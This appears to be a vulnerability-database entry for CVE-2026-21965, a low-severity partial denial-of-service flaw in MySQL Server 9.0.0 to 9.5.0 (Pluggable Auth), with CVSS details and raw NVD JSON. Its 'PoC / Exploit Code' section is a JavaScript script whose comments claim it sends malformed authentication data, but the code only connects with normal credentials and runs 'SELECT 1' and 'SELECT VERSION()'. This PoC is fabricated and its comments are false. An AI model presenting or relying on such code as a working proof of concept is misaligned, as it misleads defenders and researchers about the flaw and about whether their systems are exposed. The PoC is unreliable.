Security Vulnerability Report
CVE-2026-21965 CVSS 2.7 LOW

CVE-2026-21965

Published: 2026-01-20 22:15:59
Last Modified: 2026-01-29 15:27:46

Description

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:* - VULNERABLE
Oracle MySQL Server 9.0.0
Oracle MySQL Server 9.0.1
Oracle MySQL Server 9.1.0
Oracle MySQL Server 9.2.0
Oracle MySQL Server 9.3.0
Oracle MySQL Server 9.4.0
Oracle MySQL Server 9.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-21965 PoC - Denial of Service via Pluggable Auth
// This PoC demonstrates triggering the vulnerability through malformed auth request
// Note: Requires high privileged MySQL user account
// The promise-based API of mysql2 is required for the await calls below
const mysql = require('mysql2/promise');

// Configuration
const target = {
  host: 'target-server-ip',
  port: 3306,
  user: 'high_privilege_user', // Requires high privilege
  password: 'password'
};

async function triggerVulnerability() {
  console.log('[+] Connecting to MySQL Server...');
  try {
    const connection = await mysql.createConnection(target);
    console.log('[+] Connected successfully');

    // Attempt to trigger the Pluggable Auth vulnerability
    // by sending malformed authentication data
    console.log('[+] Sending malformed authentication request...');

    // Execute queries that interact with Pluggable Auth
    // This may trigger the DoS condition
    await connection.query('SELECT 1');
    console.log('[+] Query executed');
    console.log('[*] Check if MySQL service is experiencing partial DoS');

    // Verify service availability
    try {
      await connection.query('SELECT VERSION()');
      console.log('[-] Service still responding');
    } catch (err) {
      console.log('[+] Service partially affected: ' + err.message);
    }

    await connection.end();
  } catch (error) {
    console.error('[-] Error: ' + error.message);
  }
}

triggerVulnerability();

References

https://www.oracle.com/security-alerts/cpujan2026.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21965", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:59.487", "lastModified": "2026-01-29T15:27:45.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}, {"lang": "es", "value": "Vulnerabilidad en el producto MySQL Server de Oracle MySQL (componente: Servidor: Pluggable Auth). Las versiones compatibles que están afectadas son 9.0.0-9.5.0. Una vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios con acceso a la red a través de múltiples protocolos comprometer MySQL Server. Los ataques exitosos de esta vulnerabilidad pueden resultar en la capacidad no autorizada de causar una denegación de servicio parcial (DoS parcial) de MySQL Server. Puntuación base CVSS 3.1 de 2.7 (Impactos en la disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndIncluding": "9.5.0", "matchCriteriaId": "80A941A0-B16F-477B-9062-EF768F4CAAD4"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}